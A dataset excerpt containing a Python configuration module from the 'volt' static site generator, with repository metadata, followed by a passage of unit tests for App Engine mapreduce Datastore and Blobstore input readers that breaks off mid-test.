text
stringlengths 4
1.02M
| meta
dict |
|---|---|
"""Configuration handling."""
# Copyright (c) 2012-2022 Wibowo Arindrarto <contact@arindrarto.dev>
# SPDX-License-Identifier: BSD-3-Clause
import os
from collections import UserDict
from functools import cached_property
from pathlib import Path
from typing import cast, Any, Dict, Iterable, Literal, Optional
import tomlkit
from . import constants, error as err
__all__ = ["Config"]
class Config(UserDict):
"""Container for site-level configuration values."""
@classmethod
def from_within_project_dir(
cls,
invoc_dir: Path,
start_lookup_dir: Path,
config_file_name: str = constants.CONFIG_FILE_NAME,
**kwargs: Any,
) -> Optional["Config"]:
"""Create an instance from within a project directory.
This methods performs an upwards traversal from within the current
directory to look for a config file and loads it.
:param invoc_dir: Path to invocation directory.
:param start_lookup_dir: Path to the directory from which project
directory lookup should start. If set to ``None``, the lookup will
start from the current directory.
:param config_file_name: Name of file containing the configuration values.
"""
project_dir = _find_dir_containing(config_file_name, start_lookup_dir)
if project_dir is None:
return None
return cls.from_file_name(
invoc_dir=invoc_dir,
project_dir=project_dir.resolve(),
config_file_name=config_file_name,
**kwargs,
)
@classmethod
def from_file_name(
cls,
invoc_dir: Path,
project_dir: Path,
config_file_name: str,
**kwargs: Any,
) -> "Config":
"""Create a site configuration from a Volt config file.
:param invoc_dir: Path to the invocation directory.
:param project_dir: Path to the project working directory.
:param config_file_name: Name of file containing the configuration values.
:returns: A site config instance.
:raises ~exc.VoltConfigError: when validation fails.
"""
config_path = project_dir / config_file_name
with config_path.open() as src:
user_conf = cast(Dict[str, Any], tomlkit.load(src))
return cls(
invoc_dir=invoc_dir,
project_dir=project_dir,
user_conf=user_conf,
config_path=config_path,
**kwargs,
)
def __init__(
self,
invoc_dir: Path,
project_dir: Path,
with_drafts: bool = False,
target_dir_name: str = constants.PROJECT_TARGET_DIR_NAME,
sources_dir_name: str = constants.PROJECT_SOURCES_DIR_NAME,
themes_dir_name: str = constants.SITE_THEMES_DIR_NAME,
static_dir_name: str = constants.PROJECT_STATIC_DIR_NAME,
drafts_dir_name: str = constants.PROJECT_DRAFTS_DIR_NAME,
extension_dir_name: str = constants.PROJECT_EXTENSION_DIR_NAME,
xcmd_file_name: str = constants.XCMD_FILE_NAME,
xcmd_mod_name: str = constants.PROJECT_CLI_MOD_QUAL_NAME,
hooks_file_name: str = constants.HOOKS_FILE_NAME,
hooks_mod_name: str = constants.PROJECT_HOOKS_MOD_QUAL_NAME,
config_path: Optional[Path] = None,
user_conf: Optional[dict] = None,
slug_replacements: Iterable[Iterable[str]] = constants.SLUG_REPLACEMENTS,
**kwargs: Any,
) -> None:
"""Initialize a site-level configuration."""
uc = user_conf or {}
site_config = uc.pop("site", {})
self._name: str = site_config.pop("name", "")
self._url: str = site_config.pop("url", "")
self._slug_replacements: Iterable[Iterable[str]] = (
site_config.pop("slug_replacements", None) or slug_replacements
)
theme_config = uc.pop("theme", {}) or {}
self._theme_name = theme_config.pop("name", None) or None
self._theme_overrides = theme_config
super().__init__(site_config, **kwargs)
self._invoc_dir = invoc_dir
self._project_dir = project_dir
self._target_dir = project_dir / target_dir_name
self._sources_dir = self._project_dir / sources_dir_name
self._themes_dir = self._project_dir / themes_dir_name
self._extension_dir = self._project_dir / extension_dir_name
self._drafts_dir_name = drafts_dir_name
self._static_dir = self._project_dir / static_dir_name
self._xcmd_module_path = self._extension_dir / xcmd_file_name
self._xcmd_module_name = xcmd_mod_name
self._hooks_module_path = self._extension_dir / hooks_file_name
self._hooks_module_name = hooks_mod_name
self._config_path = config_path
self._with_drafts = with_drafts
self._server_run_path = project_dir / constants.SERVER_RUN_FILE_NAME
@property
def name(self) -> str:
"""Name of the site."""
return self._name
@property
def url(self) -> str:
"""URL of the site."""
return self._url
@property
def theme_name(self) -> Optional[str]:
"""Name of theme in use."""
return self._theme_name
@property
def theme_overrides(self) -> dict:
"""Site-level theme overrides."""
return self._theme_overrides
@property
def slug_replacements(self) -> Iterable[Iterable[str]]:
"""Slug replacements rules."""
return self._slug_replacements
@property
def project_dir(self) -> Path:
"""Path to the project root directory."""
return self._project_dir
@cached_property
def project_dir_rel(self) -> Path:
"""Path to the project directory, relative from invocation directory."""
rel = self.invoc_dir.relative_to(self.project_dir)
return Path("/".join(("..",) * len(rel.parts)))
@property
def invoc_dir(self) -> Path:
"""Path to the invocation directory."""
return self._invoc_dir
@property
def target_dir(self) -> Path:
"""Path to the site output directory."""
return self._target_dir
@property
def sources_dir(self) -> Path:
"""Path to the site source contents."""
return self._sources_dir
@property
def themes_dir(self) -> Path:
"""Path to the site themes directory."""
return self._themes_dir
@property
def drafts_dir_name(self) -> str:
"""Name of the drafts directory."""
return self._drafts_dir_name
@property
def static_dir(self) -> Path:
"""Path to the site source static files."""
return self._static_dir
@cached_property
def num_common_parts(self) -> int:
return len(self.project_dir.parts) + 1
@property
def xcmd_module_path(self) -> Path:
"""Path to a custom CLI extension."""
return self._xcmd_module_path
@property
def xcmd_module_name(self) -> str:
"""Module name for CLI extensions."""
return self._xcmd_module_name
@property
def hooks_module_path(self) -> Path:
"""Path to a custom hooks extension."""
return self._hooks_module_path
@property
def hooks_module_name(self) -> str:
"""Module name for hooks."""
return self._hooks_module_name
@property
def with_drafts(self) -> bool:
"""Whether to publish draft contents or not."""
return self._with_drafts
@property
def in_docker(self) -> bool:
return os.path.exists("/.dockerenv")
def reload(
self,
drafts: Optional[bool] = None,
config_file_name: str = constants.CONFIG_FILE_NAME,
) -> "Config":
"""Reloads the config file."""
if self._config_path is None:
raise err.VoltResourceError("could not reload non-file config")
reloaded_drafts = drafts if drafts is not None else self.with_drafts
return self.__class__.from_file_name(
invoc_dir=self.invoc_dir,
project_dir=self.project_dir,
config_file_name=config_file_name,
with_drafts=reloaded_drafts,
)
def _set_drafts(self, value: Optional[bool]) -> None:
if value is not None:
self._with_drafts = value
return None
_VCS = Literal["git"]
_ExcStyle = Literal["pretty", "plain"]
# NOTE: Not context vars because our watchers and server are thread-based
# without any clean ways of propagating the contexts.
_use_color: bool = True
_exc_style: _ExcStyle = "pretty"
def _get_use_color() -> bool:
global _use_color
return _use_color
def _set_use_color(value: bool) -> bool:
global _use_color
cur = _use_color
_use_color = value
return cur
def _get_exc_style() -> _ExcStyle:
global _exc_style
return _exc_style
def _set_exc_style(value: _ExcStyle) -> _ExcStyle:
global _exc_style
cur = _exc_style
_exc_style = value
return cur
def _find_dir_containing(file_name: str, start: Path) -> Optional[Path]:
"""Find the directory containing the filename.
Directory lookup is performed from the given start directory up until the
root (`/`) directory. If no start directory is given, the lookup starts
from the current directory.
:param file_name: The file name that should be present in the directory.
:param start: The path from which lookup starts.
:returns: The path to the directory that contains the filename or None if
no such path can be found.
"""
cur = Path(start).expanduser().resolve()
while cur != cur.parent:
if cur.joinpath(file_name).exists():
return cur
cur = cur.parent
return None
|
{
"content_hash": "474de49c2ff0581273d371c4c5451674",
"timestamp": "",
"source": "github",
"line_count": 313,
"max_line_length": 82,
"avg_line_length": 31.166134185303516,
"alnum_prop": 0.6126089185033317,
"repo_name": "bow/volt",
"id": "d334df6fd55ab8083435fe030ba35a01b66f6b5e",
"size": "9755",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "volt/config.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "1267"
},
{
"name": "Jinja",
"bytes": "883"
},
{
"name": "Makefile",
"bytes": "5475"
},
{
"name": "Python",
"bytes": "124895"
}
],
"symlink_target": ""
}
|
from google.appengine.tools import os_compat # pylint: disable-msg=W0611
import cStringIO
from testlib import mox
import os
import time
import unittest
import zipfile
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import datastore
from google.appengine.api import datastore_file_stub
from google.appengine.api import namespace_manager
from mapreduce.lib import blobstore
from google.appengine.ext import db
from mapreduce.lib import key_range
from mapreduce.lib.blobstore import blobstore as blobstore_internal
from mapreduce import input_readers
from mapreduce import model
class TestJsonType(object):
"""Test class with to_json/from_json methods."""
def __init__(self, size=0):
self.size = size
def to_json(self):
return {"size": self.size}
@classmethod
def from_json(cls, json):
return cls(json["size"])
class TestEntity(db.Model):
"""Test entity class."""
json_property = model.JsonProperty(TestJsonType)
json_property_default_value = model.JsonProperty(
TestJsonType, default=TestJsonType())
ENTITY_KIND = "__main__.TestEntity"
def key(entity_id, namespace=None):
"""Create a key for TestEntity with specified id.
Used to shorten expected data.
Args:
entity_id: entity id
Returns:
db.Key instance with specified id for TestEntity.
"""
return db.Key.from_path("TestEntity", entity_id, namespace=namespace)
class DatastoreInputReaderTest(unittest.TestCase):
"""Test Datastore{,Key,Entity}InputReader classes."""
def setUp(self):
unittest.TestCase.setUp(self)
self.appid = "testapp"
os.environ["APPLICATION_ID"] = self.appid
os.environ["AUTH_DOMAIN"] = "gmail.com"
self.resetDatastore()
namespace_manager.set_namespace(None)
def resetDatastore(self, require_indexes=False):
self.datastore = datastore_file_stub.DatastoreFileStub(
self.appid, "/dev/null", "/dev/null", require_indexes=require_indexes)
apiproxy_stub_map.apiproxy = apiproxy_stub_map.APIProxyStubMap()
apiproxy_stub_map.apiproxy.RegisterStub("datastore_v3", self.datastore)
def split(self, shard_count, namespaces=['']):
"""Generate TestEntity split.
Args:
shard_count: number of shards to split into as int.
namespaces: a list of namespace strings that should be considered in the
mapreduce.
Returns:
list of key_range.KeyRange (not DatastoreInputReader for easier testing).
"""
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
{"entity_kind": ENTITY_KIND,
"namespaces": namespaces},
shard_count)
ds_input_readers = input_readers.DatastoreInputReader.split_input(
mapper_spec)
return [input_reader._key_ranges for input_reader in ds_input_readers]
def testValidate_Passes(self):
"""Test validate function accepts valid parameters."""
params = {
"entity_kind": ENTITY_KIND,
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
input_readers.DatastoreInputReader.validate(mapper_spec)
def testValidate_NoEntityFails(self):
"""Test validate function raises exception with no entity parameter."""
params = {}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_BadClassFails(self):
"""Test validate function rejects non-matching class parameter."""
params = {}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreKeyInputReader.validate,
mapper_spec)
def testValidate_KeysOnly(self):
"""Test validate function rejects keys_only parameter."""
# Setting keys_only to true is an error.
params = {
"entity_kind": ENTITY_KIND,
"keys_only": "True"
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_BadEntityKind(self):
"""Test validate function fails without entity kind."""
# Setting keys_only to true is an error.
params = {}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_BadEntityKind(self):
"""Test validate function rejects bad entity kind."""
# Setting keys_only to true is an error.
params = {
"entity_kind": "foo",
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_BadBatchSize(self):
"""Test validate function rejects bad entity kind."""
# Setting keys_only to true is an error.
params = {
"entity_kind": ENTITY_KIND,
"batch_size": "xxx"
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
params = {
"entity_kind": ENTITY_KIND,
"batch_size": "0"
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
params = {
"entity_kind": ENTITY_KIND,
"batch_size": "-1"
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_WrongTypeNamespace(self):
"""Tests validate function rejects namespace of incorrect type."""
params = {
"entity_kind": ENTITY_KIND,
"namespaces": None
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testValidate_WrongListTypeNamespace(self):
"""Tests validate function rejects namespace list of incorrect type."""
params = {
"entity_kind": ENTITY_KIND,
"namespaces": [1, 2, 3]
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.DatastoreInputReader.validate,
mapper_spec)
def testParameters(self):
"""Test that setting string parameters as they would be passed from a
web interface works.
"""
for _ in range(0, 100):
TestEntity().put()
namespace_manager.set_namespace('google')
for _ in range(0, 100):
TestEntity().put()
namespace_manager.set_namespace('ibm')
for _ in range(0, 100):
TestEntity().put()
namespace_manager.set_namespace(None)
krange = key_range.KeyRange(key_start=key(25), key_end=key(50),
direction="ASC",
include_start=False, include_end=True)
params = {}
params["app"] = "blah"
params["batch_size"] = "42"
params["entity_kind"] = ENTITY_KIND
params["namespaces"] = "google,ibm,"
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
reader = input_readers.DatastoreInputReader.split_input(
mapper_spec)
self.assertEquals(input_readers.DatastoreInputReader, reader[0].__class__)
self.assertEquals(42, reader[0]._batch_size)
self.assertEquals(["", "ibm", "google"],
[k.namespace for k in reader[0]._key_ranges])
params["batch_size"] = "24"
params["namespaces"] = ""
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
reader = input_readers.DatastoreInputReader.split_input(
mapper_spec)
self.assertEquals(24, reader[0]._batch_size)
self.assertEquals([""], [k.namespace for k in reader[0]._key_ranges])
# Setting keys_only to false is OK (it's ignored.)
params["keys_only"] = "False"
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreInputReader",
params, 1)
reader = input_readers.DatastoreInputReader.split_input(
mapper_spec)
# But it's totally ignored on the DatastoreKeyInputReader.
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers."
"DatastoreKeyInputReader",
params, 1)
reader = input_readers.DatastoreKeyInputReader.split_input(mapper_spec)
del params["keys_only"]
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers."
"DatastoreKeyInputReader",
params, 1)
reader = input_readers.DatastoreKeyInputReader.split_input(
mapper_spec)
self.assertEquals(input_readers.DatastoreKeyInputReader,
reader[0].__class__)
# Coverage test: DatastoreEntityInputReader
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers."
"DatastoreEntityInputReader",
params, 1)
reader = input_readers.DatastoreEntityInputReader.split_input(mapper_spec)
self.assertEquals(input_readers.DatastoreEntityInputReader,
reader[0].__class__)
def testSplitNoData(self):
"""Empty split should be produced if there's no data in database."""
self.assertEquals(
[[key_range.KeyRange(key_start=None,
key_end=None,
direction='ASC',
include_start=True,
include_end=True)]],
self.split(10))
def testSplitNotEnoughData(self):
"""Splits should not intersect, if there's not enough data for each."""
TestEntity().put()
TestEntity().put()
self.assertEquals([
[key_range.KeyRange(key_start=None,
key_end=key(2),
direction="ASC",
include_start=False,
include_end=False)],
[key_range.KeyRange(key_start=key(2),
key_end=None,
direction="ASC",
include_start=True,
include_end=False,
namespace='')],
],
self.split(4))
def testSplitLotsOfData(self):
"""Test lots of data case."""
for _ in range(0, 100):
TestEntity().put()
namespace_manager.set_namespace('google')
for _ in range(0, 40):
TestEntity().put()
namespace_manager.set_namespace(None)
(reader1_key_ranges,
reader2_key_ranges,
reader3_key_ranges,
reader4_key_ranges) = self.split(4, namespaces=["", "google"])
self.assertEquals(
[
key_range.KeyRange(key_start=None,
key_end=key(103, namespace='google'),
direction="ASC",
include_start=False,
include_end=False,
namespace='google'),
key_range.KeyRange(key_start=None,
key_end=key(2),
direction="ASC",
include_start=False,
include_end=False),
],
reader1_key_ranges)
self.assertEquals(
[
key_range.KeyRange(key_start=key(103, namespace='google'),
key_end=key(115, namespace='google'),
direction="ASC",
include_start=True,
include_end=False,
namespace='google'),
key_range.KeyRange(key_start=key(2),
key_end=key(32),
direction="ASC",
include_start=True,
include_end=False),
],
reader2_key_ranges)
self.assertEquals(
[
key_range.KeyRange(key_start=key(115, namespace='google'),
key_end=key(123, namespace='google'),
direction="ASC",
include_start=True,
include_end=False,
namespace='google'),
key_range.KeyRange(key_start=key(32),
key_end=key(59),
direction="ASC",
include_start=True,
include_end=False),
],
reader3_key_ranges)
self.assertEquals(
[
key_range.KeyRange(key_start=key(123, namespace='google'),
key_end=None,
direction="ASC",
include_start=True,
include_end=False,
namespace='google'),
key_range.KeyRange(key_start=key(59),
key_end=None,
direction="ASC",
include_start=True,
include_end=False),
],
reader4_key_ranges)
def testGenerator(self):
"""Test DatastoreInputReader as generator."""
expected_entities = []
for _ in range(0, 100):
entity = TestEntity()
entity.put()
expected_entities.append(entity)
namespace_manager.set_namespace('google')
for _ in range(0, 100):
entity = TestEntity()
entity.put()
expected_entities.append(entity)
namespace_manager.set_namespace(None)
kranges = [key_range.KeyRange(key_start=key(25), key_end=key(50),
direction="ASC",
include_start=False, include_end=True),
key_range.KeyRange(key_start=key(110, namespace='google'),
key_end=key(150, namespace='google'),
direction="ASC",
include_start=False,
include_end=True,
namespace='google')]
query_range = input_readers.DatastoreInputReader(
ENTITY_KIND, kranges, 50)
entities = []
for entity in query_range:
entities.append(entity)
self.assertEquals(65, len(entities))
# Model instances are not comparable, so we'll compare a serialization.
expected_values = [entity.to_xml() for entity
in expected_entities[25:50] + expected_entities[110:150]]
actual_values = [entity.to_xml() for entity in entities]
self.assertEquals(expected_values, actual_values)
def testEntityGenerator(self):
"""Test DatastoreEntityInputReader."""
expected_entities = []
for _ in range(0, 100):
model_instance = TestEntity()
model_instance.put()
expected_entities.append(model_instance._populate_internal_entity())
namespace_manager.set_namespace('google')
for _ in range(0, 100):
model_instance = TestEntity()
model_instance.put()
expected_entities.append(model_instance._populate_internal_entity())
namespace_manager.set_namespace(None)
kranges = [key_range.KeyRange(key_start=key(25), key_end=key(50),
direction="ASC",
include_start=False, include_end=True),
key_range.KeyRange(key_start=key(110, namespace='google'),
key_end=key(150, namespace='google'),
direction="ASC",
include_start=False,
include_end=True,
namespace='google')]
query_range = input_readers.DatastoreEntityInputReader(
ENTITY_KIND, kranges, 50)
entities = []
for entity in query_range:
entities.append(entity)
self.assertEquals(65, len(entities))
self.assertEquals(expected_entities[25:50] +
expected_entities[110:150],
entities)
def testShardDescription(self):
"""Tests the human-visible description of Datastore readers."""
TestEntity().put()
TestEntity().put()
splits = self.split(2)
stringified = [str(s[0]) for s in splits]
self.assertEquals(
["ASC(None to "
"datastore_types.Key.from_path(u'TestEntity', 2, _app=u'testapp')"
")",
"ASC["
"datastore_types.Key.from_path(u'TestEntity', 2, _app=u'testapp')"
" to None)"],
stringified)
class DatastoreKeyInputReaderTest(unittest.TestCase):
"""Tests for DatastoreKeyInputReader."""
def testValidate_Passes(self):
"""Tests validation function even with invalid kind."""
params = {
"entity_kind": "InvalidKind",
}
mapper_spec = model.MapperSpec(
"FooHandler",
"mapreduce.input_readers.DatastoreKeyInputReader",
params, 1)
input_readers.DatastoreKeyInputReader.validate(mapper_spec)
def testGenerator(self):
"""Test generator functionality."""
expected_keys = []
for _ in range(0, 100):
expected_keys.append(TestEntity().put())
namespace_manager.set_namespace('google')
for _ in range(0, 100):
expected_keys.append(TestEntity().put())
namespace_manager.set_namespace(None)
kranges = [key_range.KeyRange(key_start=key(25), key_end=key(50),
direction="ASC",
include_start=False, include_end=True),
key_range.KeyRange(key_start=key(110, namespace='google'),
key_end=key(150, namespace='google'),
direction="ASC",
include_start=False,
include_end=True,
namespace='google')]
query_range = input_readers.DatastoreKeyInputReader(
ENTITY_KIND, kranges, 50)
keys = []
for k in query_range:
keys.append(k)
self.assertEquals(65, len(keys))
self.assertEquals(expected_keys[25:50] + expected_keys[110:150], keys)
def tesGeneratorNoModelOtherApp(self):
"""Test DatastoreKeyInputReader when raw kind is given, not a Model path."""
OTHER_KIND = "blahblah"
OTHER_APP = "blah"
apiproxy_stub_map.apiproxy.GetStub("datastore_v3").SetTrusted(True)
expected_keys = []
for _ in range(0, 100):
expected_keys.append(datastore.Put(datastore.Entity(OTHER_KIND,
_app=OTHER_APP)))
key_start = db.Key.from_path(OTHER_KIND, 25, _app=OTHER_APP)
key_end = db.Key.from_path(OTHER_KIND, 50, _app=OTHER_APP)
krange = key_range.KeyRange(key_start=key_start, key_end=key_end,
direction="ASC",
include_start=False, include_end=True,
_app=OTHER_APP)
query_range = input_readers.DatastoreKeyInputReader(
OTHER_KIND, [krange],
{"app": OTHER_APP, "batch_size": 50})
keys = []
for key in query_range:
keys.append(key)
self.assertEquals(
key_range.KeyRange(key_start=key, key_end=key_end,
direction="ASC",
include_start=False, include_end=True),
query_range._key_range)
self.assertEquals(25, len(keys))
self.assertEquals(expected_keys[25:50], keys)
class MockBlobInfo(object):
def __init__(self, size):
self.size = size
class BlobstoreLineInputReaderTest(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.appid = "testapp"
os.environ["APPLICATION_ID"] = self.appid
self.mox = mox.Mox()
self.original_fetch_data = blobstore.fetch_data
self.mox.StubOutWithMock(blobstore, "BlobKey", use_mock_anything=True)
self.mox.StubOutWithMock(blobstore.BlobInfo, "get", use_mock_anything=True)
def tearDown(self):
self.mox.UnsetStubs()
self.mox.ResetAll()
blobstore.fetch_data = self.original_fetch_data
def initMockedBlobstoreLineReader(self,
initial_position,
num_blocks_read,
eof_read,
end_offset,
buffer_size,
data):
input_readers.BlobstoreLineInputReader._BLOB_BUFFER_SIZE = buffer_size
# Mock out blob key so as to avoid validation.
blob_key_str = "foo"
def fetch_data(blob_key, start, end):
return data[start:end + 1]
blobstore_internal.fetch_data = fetch_data
r = input_readers.BlobstoreLineInputReader(blob_key_str,
initial_position,
initial_position + end_offset)
return r
def assertNextEquals(self, reader, expected_k, expected_v):
k, v = reader.next()
self.assertEquals(expected_k, k)
self.assertEquals(expected_v, v)
def assertDone(self, reader):
self.assertRaises(StopIteration, reader.next)
def testAtStart(self):
"""If we start at position 0, read the first record."""
blob_reader = self.initMockedBlobstoreLineReader(
0, 1, True, 100, 100, "foo\nbar\nfoobar")
self.assertNextEquals(blob_reader, 0, "foo")
self.assertNextEquals(blob_reader, len("foo\n"), "bar")
self.assertNextEquals(blob_reader, len("foo\nbar\n"), "foobar")
def testOmitFirst(self):
"""If we start in the middle of a record, start with the next record."""
blob_reader = self.initMockedBlobstoreLineReader(
1, 1, True, 100, 100, "foo\nbar\nfoobar")
self.assertNextEquals(blob_reader, len("foo\n"), "bar")
self.assertNextEquals(blob_reader, len("foo\nbar\n"), "foobar")
def testOmitNewline(self):
"""If we start on a newline, start with the record on the next byte."""
blob_reader = self.initMockedBlobstoreLineReader(
3, 1, True, 100, 100, "foo\nbar")
self.assertNextEquals(blob_reader, len("foo\n"), "bar")
def testSpanBlocks(self):
"""Test the multi block case."""
blob_reader = self.initMockedBlobstoreLineReader(
0, 4, True, 100, 2, "foo\nbar")
self.assertNextEquals(blob_reader, 0, "foo")
self.assertNextEquals(blob_reader, len("foo\n"), "bar")
def testStopAtEnd(self):
"""If we pass end position, then we don't get a record past the end."""
blob_reader = self.initMockedBlobstoreLineReader(
0, 1, False, 1, 100, "foo\nbar")
self.assertNextEquals(blob_reader, 0, "foo")
self.assertDone(blob_reader)
def testDontReturnAnythingIfPassEndBeforeFirst(self):
"""Test end behavior.
If we pass the end position when reading to the first record,
then we don't get a record past the end.
"""
blob_reader = self.initMockedBlobstoreLineReader(
3, 1, False, 0, 100, "foo\nbar")
self.assertDone(blob_reader)
def mockOutBlobInfoSize(self, size, blob_key_str="foo"):
blob_key = "bar" + blob_key_str
blobstore.BlobKey(blob_key_str).AndReturn(blob_key)
blobstore.BlobInfo.get(blob_key).AndReturn(MockBlobInfo(size))
BLOBSTORE_READER_NAME = (
"mapreduce.input_readers.BlobstoreLineInputReader")
def testSplitInput(self):
# TODO(user): Mock out equiv
self.mockOutBlobInfoSize(200)
self.mox.ReplayAll()
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ["foo"]},
"mapper_shard_count": 1})
blob_readers = input_readers.BlobstoreLineInputReader.split_input(
mapper_spec)
self.assertEquals([{"blob_key": "foo",
"initial_position": 0,
"end_position": 200}],
[r.to_json() for r in blob_readers])
self.mox.VerifyAll()
def testSplitInputMultiKey(self):
# TODO(user): Mock out equiv
for i in range(5):
self.mockOutBlobInfoSize(200, "foo%d" % i)
self.mox.ReplayAll()
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ["foo%d" % i for i in range(5)]},
"mapper_shard_count": 2})
blob_readers = input_readers.BlobstoreLineInputReader.split_input(
mapper_spec)
# Blob readers are built out of a dictionary of blob_keys and thus unsorted.
blob_readers_json = [r.to_json() for r in blob_readers]
blob_readers_json.sort(key=lambda r: r["blob_key"])
self.assertEquals([{"blob_key": "foo%d" % i,
"initial_position": 0,
"end_position": 200} for i in range(5)],
blob_readers_json)
self.mox.VerifyAll()
def testSplitInputMultiSplit(self):
self.mockOutBlobInfoSize(199)
self.mox.ReplayAll()
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ["foo"]},
"mapper_shard_count": 2})
blob_readers = input_readers.BlobstoreLineInputReader.split_input(
mapper_spec)
self.assertEquals(
[{"blob_key": "foo",
"initial_position": 0,
"end_position": 99},
{"blob_key": "foo",
"initial_position": 99,
"end_position": 199}],
[r.to_json() for r in blob_readers])
self.mox.VerifyAll()
def testShardDescription(self):
"""Tests the human-readable shard description."""
self.mockOutBlobInfoSize(199)
self.mox.ReplayAll()
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ["foo"]},
"mapper_shard_count": 2})
blob_readers = input_readers.BlobstoreLineInputReader.split_input(
mapper_spec)
stringified = [str(s) for s in blob_readers]
self.assertEquals(
["blobstore.BlobKey('foo'):[0, 99]",
"blobstore.BlobKey('foo'):[99, 199]"],
stringified)
self.mox.VerifyAll()
def testTooManyKeys(self):
"""Tests when there are too many blobkeys present as input."""
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ["foo"] * 1000},
"mapper_shard_count": 2})
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.BlobstoreLineInputReader.validate,
mapper_spec)
def testNoKeys(self):
"""Tests when there are no blobkeys present as input."""
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": []},
"mapper_shard_count": 2})
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.BlobstoreLineInputReader.validate,
mapper_spec)
def testInvalidKey(self):
"""Tests when there a blobkeys in the input is invalid."""
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.BLOBSTORE_READER_NAME,
"mapper_params": {"blob_keys": ['foo', 'nosuchblob']},
"mapper_shard_count": 2})
self.mockOutBlobInfoSize(100, blob_key_str="foo")
blobstore.BlobKey('nosuchblob').AndReturn('nosuchblob')
blobstore.BlobInfo.get('nosuchblob').AndReturn(None)
self.mox.ReplayAll()
self.assertRaises(input_readers.BadReaderParamsError,
input_readers.BlobstoreLineInputReader.validate,
mapper_spec)
self.mox.VerifyAll()
class BlobstoreZipInputReaderTest(unittest.TestCase):
READER_NAME = (
"mapreduce.input_readers.BlobstoreZipInputReader")
def setUp(self):
unittest.TestCase.setUp(self)
self.appid = "testapp"
os.environ["APPLICATION_ID"] = self.appid
self.zipdata = cStringIO.StringIO()
archive = zipfile.ZipFile(self.zipdata, "w")
for i in range(10):
archive.writestr("%d.txt" % i, "%d: %s" % (i, "*"*i))
archive.close()
def mockZipReader(self, blob_key):
"""Mocked out reader function that returns our in-memory zipfile."""
return self.zipdata
def testReadFirst(self):
"""Test that the first file in the zip is returned correctly."""
reader = input_readers.BlobstoreZipInputReader("", 0, 1, self.mockZipReader)
file_info, data_func = reader.next()
self.assertEqual(file_info.filename, "0.txt")
self.assertEqual(data_func(), "0: ")
def testReadLast(self):
"""Test we can read right up to the last file in the zip."""
reader = input_readers.BlobstoreZipInputReader("", 9, 10,
self.mockZipReader)
file_info, data_func = reader.next()
self.assertEqual(file_info.filename, "9.txt")
self.assertEqual(data_func(), "9: *********")
def testStopIteration(self):
"""Test that StopIteration is raised when we fetch past the end."""
